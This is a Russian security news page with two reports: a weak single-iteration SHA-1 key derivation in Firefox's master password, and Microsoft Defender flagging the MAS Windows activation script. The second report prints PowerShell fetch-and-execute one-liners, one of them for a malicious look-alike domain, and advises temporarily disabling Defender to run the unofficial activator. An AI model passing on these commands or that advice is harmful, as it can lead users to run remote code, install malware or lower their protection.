Система мастер-пароля в Firefox использует слабый механизм шифрования

Система мастер-пароля в Firefox использует слабый механизм шифрования

Система мастер-пароля в Firefox использует слабый механизм шифрования

На протяжении последних девяти лет Mozilla использует недостаточно устойчивый механизм шифрования для функции «мастер-пароль» («master password»). Напомним, что Firefox и Thunderbird позволяют настраивать «мастер-пароль», который используется для шифрования каждой строки любого пароля, который пользователь сохраняет в своем браузере или почтовом клиенте.

Ранее эксперты хвалили эту функцию, так как  большинство браузеров умудрялись хранить сохраненные пароли в открытом виде, что, конечно же, позволяло злоумышленникам без проблем их перехватить. Не говоря уже о том, что любой, кто имеет физический доступ к компьютеру пользователя, мог запросто просмотреть сохраненные пароли пользователя.

Однако теперь автор расширения AdBlock Plus Владимир Палант (Wladimir Palant) утверждает, что используемая функцией «мастер-пароля» схема шифрования достаточно слаба и может быть уязвима к атаке вида брутфорс.

«Заглянув в исходный код, я обнаружил функцию sftkdb_passwordToKey(), которая отвечает за конвертацию пароля в ключ шифрования при помощи алгоритма SHA-1. Так вот, здесь кроется уязвимое место», — рассказывает Палант.

Автор AdBlock Plus имеет в виду количество итераций функции SHA-1 — 1. То есть SHA-1 применяется лишь один раз, что недопустимо, учитывая, что отраслевые практики пришли к минимальной цифре в 10 000. Например, популярный менеджер паролей LastPass использует значение, равное 100 000.

Такое малое количество итераций чревато тем, что атакующий может взломать защиту, используя пресловутую атаку типа брутфорс, что позволит ему расшифровать пароли, сохраненные в базах Firefox или Thunderbird.

Палант напоминает, что современные технологии позволяют графическим процессорам подбирать несложные мастер-пароли меньше чем за минуту.

Удивительно, что Палант далеко не первый исследователь, отметивший наличие этой проблемы. Девять лет назад некто Джастин Долск (Justin Dolske) рапортовал Mozilla об этом же баге.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru